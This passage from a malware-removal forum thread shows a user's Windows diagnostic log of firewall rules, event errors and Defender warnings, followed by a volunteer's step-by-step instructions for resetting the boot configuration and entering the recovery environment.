FirewallRules: [{FBB98ABC-9569-4C9B-ACD7-72394C22E85A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe

FirewallRules: [{7D2A9822-B4AC-4027-8630-BBA86B2B3250}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe

FirewallRules: [{B61AADD3-2D37-49CE-8846-3DBE50FB4B8A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe

FirewallRules: [{2DA2B986-7667-4D2C-9E85-C2F81B954DE6}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe

FirewallRules: [{2FE73EE5-6FB3-4DC8-9CFF-B1AD59033BDD}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe

FirewallRules: [TCP Query User{5AC03A41-337A-4D35-8475-DBF7FCF3718C}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe

FirewallRules: [UDP Query User{3A9F9831-57E1-4FDB-984D-672AA8256557}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe

FirewallRules: [{57579DAD-B0A7-4600-BACB-ACFBD0BF582E}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe

FirewallRules: [{20046B7C-7FC0-4DAC-81CD-B157DC013E33}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe

FirewallRules: [TCP Query User{210A33E9-6B2B-44CF-BCF6-D34BC763A901}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [UDP Query User{BC1DE14B-4640-475C-A83B-879941C715F5}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [{207663F4-14AA-4B8C-8B75-0E34AECA606F}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [{5F89233A-ABDC-4FF1-9263-2D96AFE62121}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [TCP Query User{803AE086-7E6A-48E0-8802-785AA4FC4A01}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe

FirewallRules: [UDP Query User{DD0732C4-EE26-4E6D-9566-D42C50E770DC}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe

FirewallRules: [{92D3E127-A9C9-4A57-A4DE-C37C30EEC069}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe

FirewallRules: [{6D97C59F-C2D5-4B5F-A2EB-62DED9A63774}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe

FirewallRules: [{595BE6ED-4AE7-4E50-8492-81EF52DC503B}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll

FirewallRules: [{51406614-36DB-4932-854C-7354C320CCCE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll

FirewallRules: [{0FD1A6F0-6892-4528-8D02-6DA308CE78B8}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll

FirewallRules: [{F5C52100-551E-41EB-9F6B-22785A10B72E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll

FirewallRules: [{F90CFC89-D1E5-47FE-810D-4C2A003E3EC4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll

FirewallRules: [{B4D1EF72-3517-40C5-A216-D67E59703BD4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll

FirewallRules: [{95D8704A-2EE2-4ABF-A286-E107F9FE797F}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll

FirewallRules: [{4819C0F7-D28C-465D-9F1B-E02D925E86AE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll

FirewallRules: [{FC9BC8BE-3785-41F0-9673-77798F53F411}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll

FirewallRules: [{97D423F4-0FDF-4C9C-9062-3118615A659E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll

FirewallRules: [{F3617F33-975E-49A1-82F7-525FC3550128}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll

FirewallRules: [{A279D673-8345-423B-A713-D33AE6388178}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll

FirewallRules: [{2AC43D62-7AC9-47C0-9BAF-E92B1B7BBA30}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe

FirewallRules: [{C12F076D-5E2B-450E-91A2-3D08D18E1937}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe

FirewallRules: [{3D3CF842-8298-442A-B9C9-A5399B012E71}] => (Allow) C:\Program Files\Andy\andy.exe

FirewallRules: [{C31226E6-F861-4DEA-B2FD-2634BE6F0129}] => (Allow) C:\Program Files\Andy\andy.exe

FirewallRules: [{D12533D4-1609-4FAF-85BD-3A23601A19D7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{C02EE326-2CB8-4B8B-85EE-B9EF5101D2FC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{E6F43DE1-5773-4F5C-997C-8F9A152B8CC6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{4A1A6E79-2801-44AC-93C6-A5698676BF58}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{447CC466-EC34-4DCC-9474-38A417083D49}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe

FirewallRules: [{B6E8D305-52B5-45E2-8C5A-2EE37A8ADB44}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe

FirewallRules: [{0649CB28-67B5-48B4-B97E-CDA231670A45}] => (Allow) C:\Program Files\Andy\HandyAndy.exe

FirewallRules: [{5BAD7087-DE25-4030-A16A-578CD107BD81}] => (Allow) C:\Program Files\Andy\HandyAndy.exe

FirewallRules: [{BF1E40F5-A2D7-4946-895B-E0067521547F}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe

FirewallRules: [{17ED7A00-1D80-4074-B1AB-25880A7BB6B6}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe

FirewallRules: [TCP Query User{396BBCA8-02CB-4338-8B42-915ECADCD922}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [UDP Query User{73E87333-E910-4EEC-804C-17612FDD0764}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [{9E3E9781-622A-4CDF-A7EF-F851961BEA19}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe

FirewallRules: [{7C52A72D-17FC-484E-A819-81F527082F0F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\Resolve.exe

FirewallRules: [{5B94E67F-A6E7-4C37-B249-3CED37E49F0D}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\bmdpaneld.exe

FirewallRules: [{BA3F2295-A446-4372-A933-C67E6917CAA9}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\JLCooperPanelDaemon.exe

FirewallRules: [{AF2811BE-4318-4F7F-8F60-8E10AD92B8F2}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\EuphonixPanelDaemon.exe

FirewallRules: [{9D04EBDE-0FDE-4918-94E4-D40C3C002C6F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\TangentPanelDaemon.exe

FirewallRules: [{BDA720FB-BED0-4342-84C3-1AF5017ECCAA}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\ElementsPanelDaemon.exe

FirewallRules: [{56DE631C-A030-4DF6-B707-2D24656517FF}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\DPDecoder.exe

FirewallRules: [{B0D56FFA-C1C5-488E-B442-2038AC05A5A6}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe

FirewallRules: [TCP Query User{80D1B33D-1849-4BEE-B7BB-78C9D2D3F544}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe

FirewallRules: [UDP Query User{B40DADB6-9E25-4951-B741-8458BE0396EE}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe

FirewallRules: [{9B19D861-CA78-446B-AD40-2E9AA11FDFB5}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe

FirewallRules: [{9A1FF358-15BA-4495-8972-7D4A585582FE}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe

FirewallRules: [{DFD16930-C6D4-42A7-8594-A07EAE59D209}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe

FirewallRules: [{96FED481-82D0-450B-85C3-36735EB1549F}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe

FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) 㩃停潲牧浡䘠汩獥睜湩晤湩層楷摮楦摮攮數

FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) 㩃停潲牧浡䘠汩獥睜湩晤湩層楷摮楦摮e

FirewallRules: [{D61EF620-8F0B-40A6-9BB7-E836DA310B7C}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe

FirewallRules: [{91606396-6288-43E6-AE6F-EEB421C75181}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe

FirewallRules: [{807550B5-7265-4327-9B16-266D34A7742C}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{EE7BB404-A2CF-4E23-A355-EA7C2D953145}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{7C716CAC-0CA5-496D-B6B1-DBB04F82E573}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{047E31DF-A255-4F4C-9FE9-45DD54A3AB3B}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{B06B32BA-F38C-4C17-B422-99E7605B0063}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{E511541B-CD44-4376-A542-B6A6578FA8EE}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{068BAA54-B58F-43B6-8ADB-31E4DEE03ACC}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe

FirewallRules: [{B44756B4-DFCA-4CC9-953C-CCE8AE6CC11A}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe

FirewallRules: [{3C331E6B-E428-4D0C-BEA4-0FA06032B9D0}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe

FirewallRules: [{D450C4CE-50CA-4D6B-A47C-AF19379507B1}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe

FirewallRules: [{640DFB21-833E-420D-B80D-AC0DD899B614}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe

FirewallRules: [{6CAA584E-EA21-4F97-9554-1E5312569977}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe

FirewallRules: [{099E93F9-CFBA-4E6D-A852-0EFDF6E69C77}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe

FirewallRules: [{10B74A86-9FC5-4D84-955B-4B2C2FAADC83}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe

FirewallRules: [{65FA2FF6-971C-44E8-8D5E-C565539E0181}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe

FirewallRules: [{88078A39-6DBF-4310-9720-BC7A9811094B}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe

FirewallRules: [{5D12474E-76BE-4D8A-8BD7-4CECA0F32CFB}] => (Allow) C:\Users\Dan\AppData\Local\Kometa\Application\kometa.exe

FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) 㩃停潲牧浡䘠汩獥䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬攮數

FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) 㩃停潲牧浡䘠汩獥䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬e

FirewallRules: [{8269955E-0B8F-464C-B326-2023E770CABC}] => (Allow) C:\Program Files (x86)\Henwood\fontenot.exe

FirewallRules: [{3606180A-FA39-4B14-88F6-E879C8BB4B0B}] => (Allow) C:\Program Files (x86)\Police\fontenot.exe

FirewallRules: [{99FAD6CC-61D4-4806-B204-7F3641DDD7F3}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe

FirewallRules: [{6CCE0F5A-ED5B-48E9-898C-B3168715BED1}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe

FirewallRules: [TCP Query User{9536F0CC-5E66-46E8-805B-67D9697C530F}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe

FirewallRules: [UDP Query User{C5258519-221C-4A37-A687-51526258F672}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe

FirewallRules: [{5507329C-601E-4572-9AD8-6C16774E1ADC}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe

FirewallRules: [{187A8271-92D7-449D-8643-56ECD2671F9C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{C260D9CD-8DD2-4B5A-8BDE-C4CFD01C9F25}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [TCP Query User{DB1E8DAE-0016-43D8-BB69-DC8005FC9089}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe

FirewallRules: [UDP Query User{EA5A15E3-2AE2-47A4-AB76-6A52AAB47F97}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe

FirewallRules: [{31F2912A-119F-44BD-A9EB-53A4D506D23B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

 

==================== Restore Points =========================

 

ATTENTION: System Restore is disabled

 

==================== Faulty Device Manager Devices =============

 

Name:

Description:

Class Guid:

Manufacturer:

Service:

Problem: : The drivers for this device are not installed. (Code 28)

Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (06/14/2018 09:24:00 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

 

Process ID: 704

 

Start Time: 01d40446cca2e74d

 

Termination Time: 4294967295

 

Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe

 

Report Id: c09f3b37-703a-11e8-8365-10c37bbb446b

 

Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe

 

Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1

 

Error: (06/14/2018 08:54:34 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:54:34Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:53:36 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:53:36Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:53:06 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:53:06Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:52:36 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:52:36Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:52:06 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:52:05Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:51:35 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:51:35Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:50:07 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:50:07Z. Error Code: 0x80070020.

 

 

System errors:

=============

Error: (06/14/2018 09:27:06 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The GamesAppIntegrationService service failed to start due to the following error:

The system cannot find the file specified.

 

Error: (06/14/2018 09:23:32 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The 6320c4d4d9492959f6f8b43b8fdbf2f5 service failed to start due to the following error:

%%1053 = The service did not respond to the start or control request in a timely fashion.

 

Error: (06/14/2018 09:23:32 PM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the 6320c4d4d9492959f6f8b43b8fdbf2f5 service to connect.

 

Error: (06/14/2018 09:23:30 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The 6320c4d4d9492959f6f8b43b8fdbf2f5 service failed to start due to the following error:

%%1053 = The service did not respond to the start or control request in a timely fashion.

 

Error: (06/14/2018 09:23:30 PM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the 6320c4d4d9492959f6f8b43b8fdbf2f5 service to connect.

 

Error: (06/14/2018 09:23:29 PM) (Source: Service Control Manager) (EventID: 7022) (User: )

Description: The VMware USB Arbitration Service service hung on starting.

 

Error: (06/14/2018 09:21:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The Windows Defender Service service failed to start due to the following error:

%%577 = Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Error: (06/14/2018 09:21:50 PM) (Source: DCOM) (EventID: 10010) (User: BEATLES)

Description: The server {1B1F472E-3221-4826-97DB-2C2324D389AE} did not register with DCOM within the required timeout.

 

 

Windows Defender:

===================================

Date: 2015-02-02 09:49:52.792

Description:

Windows Defender scan has been stopped before completion.

Scan ID: {4BF9AF7B-A43D-4E64-B277-DEFB56CDC0E3}

Scan Type: Antimalware

Scan Parameters: Quick Scan

 

Date: 2015-02-02 08:06:18.260

Description:

Windows Defender scan has been stopped before completion.

Scan ID: {16FD4F1F-550C-4A26-9400-0412629CFD5A}

Scan Type: Antimalware

Scan Parameters: Quick Scan

 

Date: 2015-02-01 10:17:58.118

Description:

Windows Defender scan has been stopped before completion.

Scan ID: {BADC4EF7-6BAD-444C-AB05-92085B6CF93D}

Scan Type: Antimalware

Scan Parameters: Quick Scan

 

Date: 2015-02-01 08:23:26.263

Description:

Windows Defender scan has been stopped before completion.

Scan ID: {C9B87AF6-96B3-4644-9422-EB0CED28391C}

Scan Type: Antimalware

Scan Parameters: Quick Scan

 

Date: 2015-01-31 08:30:36.872

Description:

Windows Defender scan has been stopped before completion.

Scan ID: {4D8C80CB-F50C-47EE-94E8-DC02EC0EE056}

Scan Type: Antimalware

Scan Parameters: Quick Scan

 

Date: 2015-02-01 05:57:28.954

Description:

Windows Defender has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 110.6.0.0

Update Source: Microsoft Malware Protection Center

Signature Type: Network Inspection System

Update Type: Full

Current Engine Version:

Previous Engine Version: 2.1.10302.0

Error code: 0x80072ee7

Error description: The server name or address could not be resolved

 

Date: 2015-02-01 05:57:28.938

Description:

Windows Defender has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.167.387.0

Update Source: Microsoft Malware Protection Center

Signature Type: AntiSpyware

Update Type: Full

Current Engine Version:

Previous Engine Version: 1.1.10302.0

Error code: 0x80072ee7

Error description: The server name or address could not be resolved

 

Date: 2015-02-01 05:57:28.938

Description:

Windows Defender has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.167.387.0

Update Source: Microsoft Malware Protection Center

Signature Type: AntiVirus

Update Type: Full

Current Engine Version:

Previous Engine Version: 1.1.10302.0

Error code: 0x80072ee7

Error description: The server name or address could not be resolved

 

Date: 2015-02-01 05:57:28.844

Description:

Windows Defender has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.167.387.0

Update Source: Microsoft Update Server

Signature Type: AntiVirus

Update Type: Full

Current Engine Version:

Previous Engine Version: 1.1.10302.0

Error code: 0x8024402c

Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

 

Date: 2015-01-30 05:22:07.607

Description:

Windows Defender has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 110.6.0.0

Update Source: Microsoft Malware Protection Center

Signature Type: Network Inspection System

Update Type: Full

Current Engine Version:

Previous Engine Version: 2.1.10302.0

Error code: 0x80072ee7

Error description: The server name or address could not be resolved

 

CodeIntegrity:

===================================

 

Date: 2018-06-14 21:21:55.250

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-14 20:58:29.626

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-14 20:25:40.819

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-14 20:22:09.624

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-13 20:18:20.846

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-12 20:36:48.243

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-12 20:16:24.029

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-11 21:40:11.899

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

==================== Memory info ===========================

 

Processor: Intel® Celeron® CPU N2830 @ 2.16GHz

Percentage of memory in use: 49%

Total physical RAM: 3982.68 MB

Available physical RAM: 2029.46 MB

Total Virtual: 4686.68 MB

Available Virtual: 2812.33 MB

 

==================== Drives ================================

 

Drive c: (OS) (Fixed) (Total:444.65 GB) (Free:143.57 GB) NTFS ==>[system with boot components (obtained from drive)]

Drive d: () (Removable) (Total:7.45 GB) (Free:2.87 GB) FAT32

 

\\?\Volume{3e80ab0f-bf50-4f22-8c02-3c22ee1a6bb4}\ (Recovery) (Fixed) (Total:0.88 GB) (Free:0.59 GB) NTFS

\\?\Volume{436d9e19-7fb5-4350-864c-86573ec335b2}\ () (Fixed) (Total:0 GB) (Free:0 GB)

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (Size: 465.8 GB) (Disk ID: 3F7852A4)

 

Partition: GPT.

 

========================================================

Disk: 1 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)

 

Partition: GPT.

 

==================== End of Addition.txt ============================



#34 RayS

RayS

  • Malware Response Team
  • 2,434 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:04 AM

Posted 17 June 2018 - 02:09 AM

Hi Dan,
 

All the past Command Prompts were not done by the method link you sent because it doe'snt work for my laptop.

I can't see your computer, so it's not enough to say "it doesn't work". You need to tell me what steps you tried and which step failed. Also describe as much as possible about the failure. Give me the error message(s) verbatim, if any. Even if there are no error messages, tell me what you see on screen.
 

had to copy and paste it in word because the computer I'm using during during the day can't open notepad.

Word is not reliable for our purposes because it can substitute its own characters for some of the characters in the original logs. Normally wait until you have access to Notepad or attach the log files to your posts. In this one instance today, I am asking for a very simple log (BCD_Reset.txt). It's OK this one time to use Word, if necessary.
 
Overview
I want to reset the BCD store again in normal boot using the attached Batch file (BCDReset.bat). Then I want to try to enter Recovery Environment by aborting start-up two consecutive times.

 

Here's the Batch file: 
 
Please read this all the way through before you begin .
 
Reset BCD store

  • Please copy the attached Batch file onto the root directory of your thumb drive.
  • Insert the thumb drive into your sick laptop.
  • Start your sick laptop and use Windows Explorer to find the drive letter of your thumb drive when it is in your sick laptop. The drive letter will probably be D:\
  • Press your Windows key and type Command Prompt into the search box.
  • Right-click Command Prompt in your search results and select Run as administrator  <== Important!
  • When the black Command Prompt window opens, be sure the title of the window is Administrator: Command Prompt
  • If the title of the window is not Administrator: Command Prompt then you did something wrong. Close the black Command Prompt window and go back to step 4 and try again (be sure to right-click).
  • Type D:\BCDreset into the Command Prompt window and press Enter. If your thumb drive is on some other letter, then type that letter instead of D.
  • You should see Success in the Command Prompt window.
  • You should also see a file called BCD_Reset.txt on your thumb drive.
  • Copy and paste the contents of BCD_Reset.txt into your reply.

Consecutive Power Interruptions
Note: If you see the black screen with the circling dots going around, that means you didn't interrupt the boot-up process quickly enough in step 3 below.

  • Begin with your sick laptop completely shut down (power OFF).
  • Press the physical power button to begin the boot-up process.
  • After only 3 or 4 seconds, press and hold the power button for a minimum of six seconds to shut down your laptop.
  • Repeat steps 1 through 3 a second time.
  • Press the power button again to begin the boot-up process for a third time and let it continue to completion.

If all went well, you should see Preparing Automatic Repair on a black screen. After a short delay, you should see Diagnosing your PC.

